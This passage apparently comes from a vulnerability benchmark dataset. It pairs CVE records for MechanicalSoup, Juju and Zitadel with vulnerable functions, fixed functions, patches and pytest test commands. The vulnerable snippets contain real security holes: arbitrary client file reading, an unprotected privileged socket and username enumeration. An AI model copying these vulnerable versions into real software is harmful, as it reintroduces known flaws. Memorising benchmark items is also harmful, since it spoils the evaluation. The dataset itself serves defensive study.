isinstance(filepath, str):\n content = open(filepath, \"rb\")\n else:\n content = \"\"\n filename = os.path.basename(filepath)\n # If value is the empty string, we still pass it\n # for consistency with browsers (see\n # https://github.com/MechanicalSoup/MechanicalSoup/issues/250).\n files[name] = (filename, content)\n else:\n data.append((name, value))\n\n elif tag.name == \"button\":\n if tag.get(\"type\", \"\").lower() in (\"button\", \"reset\"):\n continue\n else:\n data.append((name, tag.get(\"value\", \"\")))\n\n elif tag.name == \"textarea\":\n data.append((name, tag.text))\n\n elif tag.name == \"select\":\n # If the value attribute is not specified, the content will\n # be passed as a value instead.\n options = tag.select(\"option\")\n selected_values = [i.get(\"value\", i.text) for i in options\n if \"selected\" in i.attrs]\n if \"multiple\" in tag.attrs:\n for value in selected_values:\n data.append((name, value))\n elif selected_values:\n # A standard select element only allows one option to be\n # selected, but browsers pick last if somehow multiple.\n data.append((name, 
selected_values[-1]))\n elif options:\n # Selects the first option if none are selected\n first_value = options[0].get(\"value\", options[0].text)\n data.append((name, first_value))\n\n if method.lower() == \"get\":\n kwargs[\"params\"] = data\n else:\n kwargs[\"data\"] = data\n\n # The following part of the function is here to respect the\n # enctype specified by the form, i.e. force sending multipart\n # content. Since Requests doesn't have yet a feature to choose\n # enctype, we have to use tricks to make it behave as we want\n # This code will be updated if Requests implements it.\n if multipart and not files:\n # Requests will switch to \"multipart/form-data\" only if\n # files pass the `if files:` test, so in this case we use\n # a modified dict that passes the if test even if empty.\n class DictThatReturnsTrue(dict):\n def __bool__(self):\n return True\n __nonzero__ = __bool__\n\n files = DictThatReturnsTrue()\n\n return cls._get_request_kwargs(method, url, files=files, **kwargs)"}, {"id": "vul_py_66_2", "commit": "b9c8a0c", "file_path": "mechanicalsoup/form.py", "start_line": 242, "end_line": 281, "snippet": " def set(self, name, value, force=False):\n \"\"\"Set a form element identified by ``name`` to a specified ``value``.\n The type of element (input, textarea, select, ...) does not\n need to be given; it is inferred by the following methods:\n :func:`~Form.set_checkbox`,\n :func:`~Form.set_radio`,\n :func:`~Form.set_input`,\n :func:`~Form.set_textarea`,\n :func:`~Form.set_select`.\n If none of these methods find a matching element, then if ``force``\n is True, a new element (````) will be\n added using :func:`~Form.new_control`.\n\n Example: filling-in a login/password form with EULA checkbox\n\n .. code-block:: python\n\n form.set(\"login\", username)\n form.set(\"password\", password)\n form.set(\"eula-checkbox\", True)\n\n Example: uploading a file through a ```` field (provide the path to the local file,\n and its content will be uploaded):\n\n .. code-block:: python\n\n form.set(\"tagname\", path_to_local_file)\n\n \"\"\"\n for func in (\"checkbox\", \"radio\", \"input\", \"textarea\", \"select\"):\n try:\n getattr(self, \"set_\" + func)({name: value})\n return\n except InvalidFormMethod:\n pass\n if force:\n self.new_control('text', name, value=value)\n return\n raise LinkNotFoundError(\"No valid element named \" + name)"}, {"id": "vul_py_66_3", "commit": "b9c8a0c", "file_path": "mechanicalsoup/form.py", "start_line": 283, "end_line": 304, "snippet": " def new_control(self, type, name, value, **kwargs):\n \"\"\"Add a new input element to the form.\n\n The arguments set the attributes of the new element.\n \"\"\"\n # Remove existing input-like elements with the same name\n for tag in ('input', 'textarea', 'select'):\n for old in self.form.find_all(tag, {'name': name}):\n old.decompose()\n # We don't have access to the original soup object (just the\n # Tag), so we instantiate a new BeautifulSoup() to call\n # new_tag(). We're only building the soup object, not parsing\n # anything, so the parser doesn't matter. 
Specify the one\n # included in Python to avoid having dependency issue.\n control = BeautifulSoup(\"\", \"html.parser\").new_tag('input')\n control['type'] = type\n control['name'] = name\n control['value'] = value\n for k, v in kwargs.items():\n control[k] = v\n self.form.append(control)\n return control"}], "fix_func": [{"id": "fix_py_66_1", "commit": "d57c4a269bba3b9a0c5bfa20292955b849006d9e", "file_path": "mechanicalsoup/browser.py", "start_line": 188, "end_line": 296, "snippet": " @classmethod\n def get_request_kwargs(cls, form, url=None, **kwargs):\n \"\"\"Extract input data from the form.\"\"\"\n method = str(form.get(\"method\", \"get\"))\n action = form.get(\"action\")\n url = urllib.parse.urljoin(url, action)\n if url is None: # This happens when both `action` and `url` are None.\n raise ValueError('no URL to submit to')\n\n # read https://www.w3.org/TR/html52/sec-forms.html\n if method.lower() == \"get\":\n data = kwargs.pop(\"params\", dict())\n else:\n data = kwargs.pop(\"data\", dict())\n files = kwargs.pop(\"files\", dict())\n\n # Use a list of 2-tuples to better reflect the behavior of browser QSL.\n # Requests also retains order when encoding form data in 2-tuple lists.\n data = [(k, v) for k, v in data.items()]\n\n multipart = form.get(\"enctype\", \"\") == \"multipart/form-data\"\n\n # Process form tags in the order that they appear on the page,\n # skipping those tags that do not have a name-attribute.\n selector = \",\".join(f\"{tag}[name]\" for tag in\n (\"input\", \"button\", \"textarea\", \"select\"))\n for tag in form.select(selector):\n name = tag.get(\"name\") # name-attribute of tag\n\n # Skip disabled elements, since they should not be submitted.\n if tag.has_attr('disabled'):\n continue\n\n if tag.name == \"input\":\n if tag.get(\"type\", \"\").lower() in (\"radio\", \"checkbox\"):\n if \"checked\" not in tag.attrs:\n continue\n value = tag.get(\"value\", \"on\")\n else:\n # browsers use empty string for inputs with missing values\n value = tag.get(\"value\", \"\")\n\n # If the enctype is not multipart, the filename is put in\n # the form as a text input and the file is not sent.\n if is_multipart_file_upload(form, tag):\n if isinstance(value, io.IOBase):\n content = value\n filename = os.path.basename(getattr(value, \"name\", \"\"))\n else:\n content = \"\"\n filename = os.path.basename(value)\n # If content is the empty string, we still pass it\n # for consistency with browsers (see\n # https://github.com/MechanicalSoup/MechanicalSoup/issues/250).\n files[name] = (filename, content)\n else:\n if isinstance(value, io.IOBase):\n value = os.path.basename(getattr(value, \"name\", \"\"))\n data.append((name, value))\n\n elif tag.name == \"button\":\n if tag.get(\"type\", \"\").lower() in (\"button\", \"reset\"):\n continue\n else:\n data.append((name, tag.get(\"value\", \"\")))\n\n elif tag.name == \"textarea\":\n data.append((name, tag.text))\n\n elif tag.name == \"select\":\n # If the value attribute is not specified, the content will\n # be passed as a value instead.\n options = tag.select(\"option\")\n selected_values = [i.get(\"value\", i.text) for i in options\n if \"selected\" in i.attrs]\n if \"multiple\" in tag.attrs:\n for value in selected_values:\n data.append((name, value))\n elif selected_values:\n # A standard select element only allows one option to be\n # selected, but browsers pick last if somehow multiple.\n data.append((name, selected_values[-1]))\n elif options:\n # Selects the first option if none are selected\n first_value = 
options[0].get(\"value\", options[0].text)\n data.append((name, first_value))\n\n if method.lower() == \"get\":\n kwargs[\"params\"] = data\n else:\n kwargs[\"data\"] = data\n\n # The following part of the function is here to respect the\n # enctype specified by the form, i.e. force sending multipart\n # content. Since Requests doesn't have yet a feature to choose\n # enctype, we have to use tricks to make it behave as we want\n # This code will be updated if Requests implements it.\n if multipart and not files:\n # Requests will switch to \"multipart/form-data\" only if\n # files pass the `if files:` test, so in this case we use\n # a modified dict that passes the if test even if empty.\n class DictThatReturnsTrue(dict):\n def __bool__(self):\n return True\n __nonzero__ = __bool__\n\n files = DictThatReturnsTrue()\n\n return cls._get_request_kwargs(method, url, files=files, **kwargs)"}, {"id": "fix_py_66_2", "commit": "d57c4a269bba3b9a0c5bfa20292955b849006d9e", "file_path": "mechanicalsoup/form.py", "start_line": 244, "end_line": 283, "snippet": " def set(self, name, value, force=False):\n \"\"\"Set a form element identified by ``name`` to a specified ``value``.\n The type of element (input, textarea, select, ...) does not\n need to be given; it is inferred by the following methods:\n :func:`~Form.set_checkbox`,\n :func:`~Form.set_radio`,\n :func:`~Form.set_input`,\n :func:`~Form.set_textarea`,\n :func:`~Form.set_select`.\n If none of these methods find a matching element, then if ``force``\n is True, a new element (````) will be\n added using :func:`~Form.new_control`.\n\n Example: filling-in a login/password form with EULA checkbox\n\n .. code-block:: python\n\n form.set(\"login\", username)\n form.set(\"password\", password)\n form.set(\"eula-checkbox\", True)\n\n Example: uploading a file through a ```` field (provide an open file object,\n and its content will be uploaded):\n\n .. code-block:: python\n\n form.set(\"tagname\", open(path_to_local_file, \"rb\"))\n\n \"\"\"\n for func in (\"checkbox\", \"radio\", \"input\", \"textarea\", \"select\"):\n try:\n getattr(self, \"set_\" + func)({name: value})\n return\n except InvalidFormMethod:\n pass\n if force:\n self.new_control('text', name, value=value)\n return\n raise LinkNotFoundError(\"No valid element named \" + name)"}, {"id": "fix_py_66_3", "commit": "d57c4a269bba3b9a0c5bfa20292955b849006d9e", "file_path": "mechanicalsoup/form.py", "start_line": 285, "end_line": 307, "snippet": " def new_control(self, type, name, value, **kwargs):\n \"\"\"Add a new input element to the form.\n\n The arguments set the attributes of the new element.\n \"\"\"\n # Remove existing input-like elements with the same name\n for tag in ('input', 'textarea', 'select'):\n for old in self.form.find_all(tag, {'name': name}):\n old.decompose()\n # We don't have access to the original soup object (just the\n # Tag), so we instantiate a new BeautifulSoup() to call\n # new_tag(). We're only building the soup object, not parsing\n # anything, so the parser doesn't matter. 
Specify the one\n # included in Python to avoid having dependency issue.\n control = BeautifulSoup(\"\", \"html.parser\").new_tag('input')\n control['type'] = type\n control['name'] = name\n control['value'] = value\n for k, v in kwargs.items():\n control[k] = v\n self._assert_valid_file_upload(control, value)\n self.form.append(control)\n return control"}, {"id": "fix_py_66_4", "commit": "d57c4a269bba3b9a0c5bfa20292955b849006d9e", "file_path": "mechanicalsoup/utils.py", "start_line": 19, "end_line": 23, "snippet": "def is_multipart_file_upload(form, tag):\n return (\n form.get(\"enctype\", \"\") == \"multipart/form-data\" and\n tag.get(\"type\", \"\").lower() == \"file\"\n )"}, {"id": "fix_py_66_5", "commit": "d57c4a269bba3b9a0c5bfa20292955b849006d9e", "file_path": "mechanicalsoup/form.py", "start_line": 390, "end_line": 402, "snippet": " def _assert_valid_file_upload(self, tag, value):\n \"\"\"Raise an exception if a multipart file input is not an open file.\"\"\"\n if (\n is_multipart_file_upload(self.form, tag) and\n not isinstance(value, io.IOBase)\n ):\n raise ValueError(\n \"From v1.3.0 onwards, you must pass an open file object \"\n 'directly, e.g. `form[\"name\"] = open(\"/path/to/file\", \"rb\")`. '\n \"This change is to remediate a security vulnerability where \"\n \"a malicious web server could read arbitrary files from the \"\n \"client (CVE-2023-34457).\"\n )"}], "vul_patch": "--- a/mechanicalsoup/browser.py\n+++ b/mechanicalsoup/browser.py\n@@ -42,18 +42,20 @@\n \n # If the enctype is not multipart, the filename is put in\n # the form as a text input and the file is not sent.\n- if tag.get(\"type\", \"\").lower() == \"file\" and multipart:\n- filepath = value\n- if filepath != \"\" and isinstance(filepath, str):\n- content = open(filepath, \"rb\")\n+ if is_multipart_file_upload(form, tag):\n+ if isinstance(value, io.IOBase):\n+ content = value\n+ filename = os.path.basename(getattr(value, \"name\", \"\"))\n else:\n content = \"\"\n- filename = os.path.basename(filepath)\n- # If value is the empty string, we still pass it\n+ filename = os.path.basename(value)\n+ # If content is the empty string, we still pass it\n # for consistency with browsers (see\n # https://github.com/MechanicalSoup/MechanicalSoup/issues/250).\n files[name] = (filename, content)\n else:\n+ if isinstance(value, io.IOBase):\n+ value = os.path.basename(getattr(value, \"name\", \"\"))\n data.append((name, value))\n \n elif tag.name == \"button\":\n\n--- a/mechanicalsoup/form.py\n+++ b/mechanicalsoup/form.py\n@@ -20,12 +20,12 @@\n form.set(\"eula-checkbox\", True)\n \n Example: uploading a file through a ```` field (provide the path to the local file,\n+ name=\"tagname\">`` field (provide an open file object,\n and its content will be uploaded):\n \n .. 
code-block:: python\n \n- form.set(\"tagname\", path_to_local_file)\n+ form.set(\"tagname\", open(path_to_local_file, \"rb\"))\n \n \"\"\"\n for func in (\"checkbox\", \"radio\", \"input\", \"textarea\", \"select\"):\n\n--- a/mechanicalsoup/form.py\n+++ b/mechanicalsoup/form.py\n@@ -18,5 +18,6 @@\n control['value'] = value\n for k, v in kwargs.items():\n control[k] = v\n+ self._assert_valid_file_upload(control, value)\n self.form.append(control)\n return control\n\n--- /dev/null\n+++ b/mechanicalsoup/form.py\n@@ -0,0 +1,5 @@\n+def is_multipart_file_upload(form, tag):\n+ return (\n+ form.get(\"enctype\", \"\") == \"multipart/form-data\" and\n+ tag.get(\"type\", \"\").lower() == \"file\"\n+ )\n\n--- /dev/null\n+++ b/mechanicalsoup/form.py\n@@ -0,0 +1,13 @@\n+ def _assert_valid_file_upload(self, tag, value):\n+ \"\"\"Raise an exception if a multipart file input is not an open file.\"\"\"\n+ if (\n+ is_multipart_file_upload(self.form, tag) and\n+ not isinstance(value, io.IOBase)\n+ ):\n+ raise ValueError(\n+ \"From v1.3.0 onwards, you must pass an open file object \"\n+ 'directly, e.g. `form[\"name\"] = open(\"/path/to/file\", \"rb\")`. '\n+ \"This change is to remediate a security vulnerability where \"\n+ \"a malicious web server could read arbitrary files from the \"\n+ \"client (CVE-2023-34457).\"\n+ )\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-34457:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/MechanicalSoup\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2023-34457/bin/python -m pytest tests/test_browser.py::test_enctype_and_file_submit tests/test_stateful_browser.py::test_upload_file_with_malicious_default tests/test_stateful_browser.py::test_upload_file tests/test_stateful_browser.py::test_upload_file_raise_on_string_input\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-34457:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/MechanicalSoup\ngit apply --whitespace=nowarn /workspace/fix.patch\n/workspace/PoC_env/CVE-2023-34457/bin/python -m pytest tests/test_browser.py tests/test_stateful_browser.py -k \"not test_enctype_and_file_submit and not test_upload_file and not test_select_form_associated_elements and not test_launch_browser\" -p no:warning --disable-warnings\n"} {"cve_id": "CVE-2017-9232", "cve_description": "Juju before 1.25.12, 2.0.x before 2.0.4, and 2.1.x before 2.1.3 uses a UNIX domain socket without setting appropriate permissions, allowing privilege escalation by users on the system to root.", "cwe_info": {"CWE-862": {"name": "Missing Authorization", "description": "The product does not perform an authorization check when an actor attempts to access a resource or perform an action."}}, "repo": "https://github.com/juju/juju", "patch_url": ["https://github.com/juju/juju/commit/145a1d3048843004590baaf0417547bac90662d9", "https://github.com/juju/juju/commit/d4dc689bfb632dd09a58c4e3776c2559714e17e4", "https://github.com/juju/juju/commit/78c832f1d1e0d7d45b35c4d0e3915744a065cfcf"], "programing_language": "Go", "vul_func": [{"id": "vul_go_162_1", "commit": "2601c35", "file_path": "juju/sockets/sockets_nix.go", "start_line": 21, "end_line": 28, "snippet": "func Listen(socketPath string) (net.Listener, error) {\n\t// In case the unix socket is present, delete it.\n\tif err := os.Remove(socketPath); err != nil {\n\t\tlogger.Tracef(\"ignoring error on removing %q: %v\", socketPath, err)\n\t}\n\tlistener, err := net.Listen(\"unix\", 
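Annotation on the CVE-2023-34457 record: the MechanicalSoup change is behavioral as much as it is a patch. Since 1.3.0 a plain string assigned to a file input is submitted verbatim as text, and only an explicitly opened file object causes local content to be read, so a server-supplied default value can no longer exfiltrate files. A usage sketch against a hypothetical form (URL and field name invented):

```python
import mechanicalsoup

browser = mechanicalsoup.StatefulBrowser()
browser.open("https://example.com/upload")  # hypothetical page with a form
browser.select_form()
# A malicious page pre-filling <input type="file" value="/etc/passwd"> now
# submits the bare string; only this explicit opt-in reads a local file:
browser["attachment"] = open("report.pdf", "rb")
browser.submit_selected()
```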
socketPath)\n\treturn listener, errors.Trace(err)\n}"}], "fix_func": [{"id": "fix_go_162_1", "commit": "145a1d3", "file_path": "juju/sockets/sockets_nix.go", "start_line": 23, "end_line": 56, "snippet": "func Listen(socketPath string) (net.Listener, error) {\n\t// In case the unix socket is present, delete it.\n\tif err := os.Remove(socketPath); err != nil {\n\t\tlogger.Tracef(\"ignoring error on removing %q: %v\", socketPath, err)\n\t}\n\t// We first create the socket in a temporary directory as a subdirectory of\n\t// the target dir so we know we can get the permissions correct and still\n\t// rename the socket into the correct place.\n\t// ioutil.TempDir creates the temporary directory as 0700 so it starts with\n\t// the right perms as well.\n\tsocketDir, socketName := filepath.Split(socketPath)\n\t// socketName here is just the prefix for the temporary dir name,\n\t// so it won't collide\n\ttempdir, err := ioutil.TempDir(socketDir, socketName)\n\tif err != nil {\n\t\treturn nil, errors.Trace(err)\n\t}\n\tdefer os.RemoveAll(tempdir)\n\ttempSocketPath := filepath.Join(tempdir, socketName)\n\tlistener, err := net.Listen(\"unix\", tempSocketPath)\n\tif err != nil {\n\t\tlogger.Errorf(\"failed to listen on unix:%s: %v\", socketPath, err)\n\t\treturn nil, errors.Trace(err)\n\t}\n\tif err := os.Chmod(tempSocketPath, 0700); err != nil {\n\t\tlistener.Close()\n\t\treturn nil, errors.Trace(err)\n\t}\n\tif err := os.Rename(tempSocketPath, socketPath); err != nil {\n\t\tlistener.Close()\n\t\treturn nil, errors.Trace(err)\n\t}\n\treturn listener, nil\n}"}], "vul_patch": "--- a/juju/sockets/sockets_nix.go\n+++ b/juju/sockets/sockets_nix.go\n@@ -3,6 +3,32 @@\n \tif err := os.Remove(socketPath); err != nil {\n \t\tlogger.Tracef(\"ignoring error on removing %q: %v\", socketPath, err)\n \t}\n-\tlistener, err := net.Listen(\"unix\", socketPath)\n-\treturn listener, errors.Trace(err)\n+\t// We first create the socket in a temporary directory as a subdirectory of\n+\t// the target dir so we know we can get the permissions correct and still\n+\t// rename the socket into the correct place.\n+\t// ioutil.TempDir creates the temporary directory as 0700 so it starts with\n+\t// the right perms as well.\n+\tsocketDir, socketName := filepath.Split(socketPath)\n+\t// socketName here is just the prefix for the temporary dir name,\n+\t// so it won't collide\n+\ttempdir, err := ioutil.TempDir(socketDir, socketName)\n+\tif err != nil {\n+\t\treturn nil, errors.Trace(err)\n+\t}\n+\tdefer os.RemoveAll(tempdir)\n+\ttempSocketPath := filepath.Join(tempdir, socketName)\n+\tlistener, err := net.Listen(\"unix\", tempSocketPath)\n+\tif err != nil {\n+\t\tlogger.Errorf(\"failed to listen on unix:%s: %v\", socketPath, err)\n+\t\treturn nil, errors.Trace(err)\n+\t}\n+\tif err := os.Chmod(tempSocketPath, 0700); err != nil {\n+\t\tlistener.Close()\n+\t\treturn nil, errors.Trace(err)\n+\t}\n+\tif err := os.Rename(tempSocketPath, socketPath); err != nil {\n+\t\tlistener.Close()\n+\t\treturn nil, errors.Trace(err)\n+\t}\n+\treturn listener, nil\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2025-31124", "cve_description": "Zitadel is open-source identity infrastructure software. ZITADEL administrators can enable a setting called \"Ignoring unknown usernames\" which helps mitigate attacks that try to guess/enumerate usernames. If enabled, ZITADEL will show the password prompt even if the user doesn't exist and report \"Username or Password invalid\". 
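Annotation on the CVE-2017-9232 record: the juju fix sidesteps the race between listening and a later chmod. The socket is created inside a fresh directory (which `ioutil.TempDir` makes 0700), tightened, and only then renamed into the public path, so there is no window in which another local user can connect. A Python rendition of the same dance (function and prefix names are mine):

```python
import os
import socket
import tempfile

def listen(socket_path: str) -> socket.socket:
    sock_dir, sock_name = os.path.split(socket_path)
    tmpdir = tempfile.mkdtemp(prefix=sock_name, dir=sock_dir)  # created mode 0700
    tmp_path = os.path.join(tmpdir, sock_name)
    server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    server.bind(tmp_path)             # socket is born inside the private dir
    os.chmod(tmp_path, 0o700)         # belt and braces, as in the Go fix
    server.listen()
    os.rename(tmp_path, socket_path)  # atomic publish with perms already set
    os.rmdir(tmpdir)
    return server
```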
While the setting was correctly respected during the login flow, the user's username was normalized leading to a disclosure of the user's existence. This vulnerability is fixed in 2.71.6, 2.70.8, 2.69.9, 2.68.9, 2.67.13, 2.66.16, 2.65.7, 2.64.6, and 2.63.9.", "cwe_info": {"CWE-200": {"name": "Exposure of Sensitive Information to an Unauthorized Actor", "description": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information."}}, "repo": "https://github.com/zitadel/zitadel", "patch_url": ["https://github.com/zitadel/zitadel/commit/14de8ecac2afafee4975ed7ac26f3ca4a2b0f82c"], "programing_language": "Go", "vul_func": [{"id": "vul_go_289_1", "commit": "2eb187f1410a25e80ff86255923d534041c8d139", "file_path": "internal/auth/repository/eventsourcing/eventstore/auth_request.go", "start_line": 768, "end_line": 832, "snippet": "func (repo *AuthRequestRepo) checkLoginName(ctx context.Context, request *domain.AuthRequest, loginNameInput string) (err error) {\n\tvar user *user_view_model.UserView\n\tloginNameInput = strings.TrimSpace(loginNameInput)\n\tpreferredLoginName := loginNameInput\n\tif request.RequestedOrgID != \"\" {\n\t\tif request.RequestedOrgDomain {\n\t\t\tdomainPolicy, err := repo.getDomainPolicy(ctx, request.RequestedOrgID)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif domainPolicy.UserLoginMustBeDomain {\n\t\t\t\tpreferredLoginName += \"@\" + request.RequestedPrimaryDomain\n\t\t\t}\n\t\t}\n\t\tuser, err = repo.checkLoginNameInputForResourceOwner(ctx, request, loginNameInput, preferredLoginName)\n\t} else {\n\t\tuser, err = repo.checkLoginNameInput(ctx, request, loginNameInput, preferredLoginName)\n\t}\n\t// return any error apart from not found ones directly\n\tif err != nil && !zerrors.IsNotFound(err) {\n\t\treturn err\n\t}\n\t// if there's an active (human) user, let's use it\n\tif user != nil && !user.HumanView.IsZero() && domain.UserState(user.State).IsEnabled() {\n\t\trequest.SetUserInfo(user.ID, loginNameInput, user.PreferredLoginName, \"\", \"\", user.ResourceOwner)\n\t\treturn nil\n\t}\n\t// the user was either not found or not active\n\t// so check if the loginname suffix matches a verified org domain\n\t// but only if no org was requested (by id or domain)\n\tif request.RequestedOrgID == \"\" {\n\t\tok, errDomainDiscovery := repo.checkDomainDiscovery(ctx, request, loginNameInput)\n\t\tif errDomainDiscovery != nil || ok {\n\t\t\treturn errDomainDiscovery\n\t\t}\n\t}\n\t// let's once again check if the user was just inactive\n\tif user != nil && user.State == int32(domain.UserStateInactive) {\n\t\treturn zerrors.ThrowPreconditionFailed(nil, \"AUTH-2n8fs\", \"Errors.User.Inactive\")\n\t}\n\t// or locked\n\tif user != nil && user.State == int32(domain.UserStateLocked) {\n\t\treturn zerrors.ThrowPreconditionFailed(nil, \"AUTH-SF3gb\", \"Errors.User.Locked\")\n\t}\n\t// let's just check if unknown usernames are ignored\n\tif request.LoginPolicy != nil && request.LoginPolicy.IgnoreUnknownUsernames {\n\t\tif request.LabelPolicy != nil && request.LabelPolicy.HideLoginNameSuffix {\n\t\t\tpreferredLoginName = loginNameInput\n\t\t}\n\t\trequest.SetUserInfo(unknownUserID, preferredLoginName, preferredLoginName, preferredLoginName, \"\", request.RequestedOrgID)\n\t\treturn nil\n\t}\n\t// there was no policy that allowed unknown loginnames in any case\n\t// so not found errors can now be returned\n\tif err != nil {\n\t\treturn err\n\t}\n\t// let's check if it was a machine user\n\tif !user.MachineView.IsZero() 
{\n\t\treturn zerrors.ThrowPreconditionFailed(nil, \"AUTH-DGV4g\", \"Errors.User.NotHuman\")\n\t}\n\t// everything should be handled by now\n\tlogging.WithFields(\"authRequest\", request.ID, \"loginName\", loginNameInput).Error(\"unhandled state for checkLoginName\")\n\treturn zerrors.ThrowInternal(nil, \"AUTH-asf3df\", \"Errors.Internal\")\n}"}, {"id": "vul_go_289_2", "commit": "2eb187f1410a25e80ff86255923d534041c8d139", "file_path": "internal/auth/repository/eventsourcing/eventstore/auth_request.go", "start_line": 1037, "end_line": 1161, "snippet": "func (repo *AuthRequestRepo) nextSteps(ctx context.Context, request *domain.AuthRequest, checkLoggedIn bool) (steps []domain.NextStep, err error) {\n\tctx, span := tracing.NewSpan(ctx)\n\tdefer func() { span.EndWithError(err) }()\n\n\tif request == nil {\n\t\treturn nil, zerrors.ThrowInvalidArgument(nil, \"EVENT-ds27a\", \"Errors.Internal\")\n\t}\n\tsteps = make([]domain.NextStep, 0)\n\tif !checkLoggedIn && domain.IsPrompt(request.Prompt, domain.PromptNone) {\n\t\treturn append(steps, &domain.RedirectToCallbackStep{}), nil\n\t}\n\tif request.UserID == \"\" {\n\t\tsteps, err = repo.nextStepsUser(ctx, request)\n\t\tif err != nil || len(steps) > 0 {\n\t\t\treturn steps, err\n\t\t}\n\t}\n\tuser, err := activeUserByID(ctx, repo.UserViewProvider, repo.UserEventProvider, repo.OrgViewProvider, repo.LockoutPolicyViewProvider, request.UserID, request.LoginPolicy.IgnoreUnknownUsernames)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif user.PreferredLoginName != \"\" {\n\t\trequest.LoginName = user.PreferredLoginName\n\t}\n\tuserSession, err := userSessionByIDs(ctx, repo.UserSessionViewProvider, repo.UserEventProvider, request.AgentID, user)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\trequest.SessionID = userSession.ID\n\trequest.DisplayName = userSession.DisplayName\n\trequest.AvatarKey = userSession.AvatarKey\n\tif user.HumanView != nil && user.HumanView.PreferredLanguage != \"\" {\n\t\trequest.PreferredLanguage = gu.Ptr(language.Make(user.HumanView.PreferredLanguage))\n\t}\n\n\tisInternalLogin := (request.SelectedIDPConfigID == \"\" && userSession.SelectedIDPConfigID == \"\") || request.RequestLocalAuth\n\tidps, err := checkExternalIDPsOfUser(ctx, repo.IDPUserLinksProvider, user.ID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tnoLocalAuth := request.LoginPolicy != nil && !request.LoginPolicy.AllowUsernamePassword\n\n\tallowedLinkedIDPs := checkForAllowedIDPs(request.AllowedExternalIDPs, idps.Links)\n\tif (!isInternalLogin || len(allowedLinkedIDPs) > 0 || noLocalAuth) &&\n\t\tlen(request.LinkingUsers) == 0 &&\n\t\t!request.RequestLocalAuth {\n\t\tstep, err := repo.idpChecked(request, allowedLinkedIDPs, userSession)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif step != nil {\n\t\t\treturn append(steps, step), nil\n\t\t}\n\t}\n\tif isInternalLogin || (!isInternalLogin && len(request.LinkingUsers) > 0) {\n\t\tstep := repo.firstFactorChecked(ctx, request, user, userSession)\n\t\tif step != nil {\n\t\t\treturn append(steps, step), nil\n\t\t}\n\t}\n\n\t// If the user never had a verified email, we need to verify it.\n\t// This prevents situations, where OTP email is the only MFA method and no verified email is set.\n\t// If the user had a verified email, but change it and has not yet verified the new one, we'll verify it after we checked the MFA methods.\n\tif user.VerifiedEmail == \"\" && !user.IsEmailVerified {\n\t\treturn append(steps, &domain.VerifyEMailStep{\n\t\t\tInitPassword: !user.PasswordSet && len(idps.Links) == 0,\n\t\t}), 
nil\n\t}\n\n\tstep, ok, err := repo.mfaChecked(userSession, request, user, isInternalLogin && len(request.LinkingUsers) == 0)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif !ok {\n\t\treturn append(steps, step), nil\n\t}\n\n\texpired := passwordAgeChangeRequired(request.PasswordAgePolicy, user.PasswordChanged)\n\tif expired || user.PasswordChangeRequired {\n\t\tsteps = append(steps, &domain.ChangePasswordStep{Expired: expired})\n\t}\n\tif !user.IsEmailVerified {\n\t\tsteps = append(steps, &domain.VerifyEMailStep{\n\t\t\tInitPassword: !user.PasswordSet && len(idps.Links) == 0,\n\t\t})\n\t}\n\tif user.UsernameChangeRequired {\n\t\tsteps = append(steps, &domain.ChangeUsernameStep{})\n\t}\n\n\tif expired || user.PasswordChangeRequired || !user.IsEmailVerified || user.UsernameChangeRequired {\n\t\treturn steps, nil\n\t}\n\n\tif request.LinkingUsers != nil && len(request.LinkingUsers) != 0 {\n\t\treturn append(steps, &domain.LinkUsersStep{}), nil\n\t}\n\t//PLANNED: consent step\n\n\tmissing, err := projectRequired(ctx, request, repo.ProjectProvider)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif missing {\n\t\treturn append(steps, &domain.ProjectRequiredStep{}), nil\n\t}\n\n\tmissing, err = userGrantRequired(ctx, request, user, repo.UserGrantProvider)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif missing {\n\t\treturn append(steps, &domain.GrantRequiredStep{}), nil\n\t}\n\n\tok, err = repo.hasSucceededPage(ctx, request, repo.ApplicationProvider)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif ok {\n\t\tsteps = append(steps, &domain.LoginSucceededStep{})\n\t}\n\treturn append(steps, &domain.RedirectToCallbackStep{}), nil\n}"}], "fix_func": [{"id": "fix_go_289_1", "commit": "14de8ecac2afafee4975ed7ac26f3ca4a2b0f82c", "file_path": "internal/auth/repository/eventsourcing/eventstore/auth_request.go", "start_line": 768, "end_line": 832, "snippet": "func (repo *AuthRequestRepo) checkLoginName(ctx context.Context, request *domain.AuthRequest, loginNameInput string) (err error) {\n\tvar user *user_view_model.UserView\n\tloginNameInput = strings.TrimSpace(loginNameInput)\n\tpreferredLoginName := loginNameInput\n\tif request.RequestedOrgID != \"\" {\n\t\tif request.RequestedOrgDomain {\n\t\t\tdomainPolicy, err := repo.getDomainPolicy(ctx, request.RequestedOrgID)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif domainPolicy.UserLoginMustBeDomain {\n\t\t\t\tpreferredLoginName += \"@\" + request.RequestedPrimaryDomain\n\t\t\t}\n\t\t}\n\t\tuser, err = repo.checkLoginNameInputForResourceOwner(ctx, request, loginNameInput, preferredLoginName)\n\t} else {\n\t\tuser, err = repo.checkLoginNameInput(ctx, request, loginNameInput, preferredLoginName)\n\t}\n\t// return any error apart from not found ones directly\n\tif err != nil && !zerrors.IsNotFound(err) {\n\t\treturn err\n\t}\n\t// if there's an active (human) user, let's use it\n\tif user != nil && !user.HumanView.IsZero() && domain.UserState(user.State).IsEnabled() {\n\t\trequest.SetUserInfo(user.ID, loginNameInput, preferredLoginName, \"\", \"\", 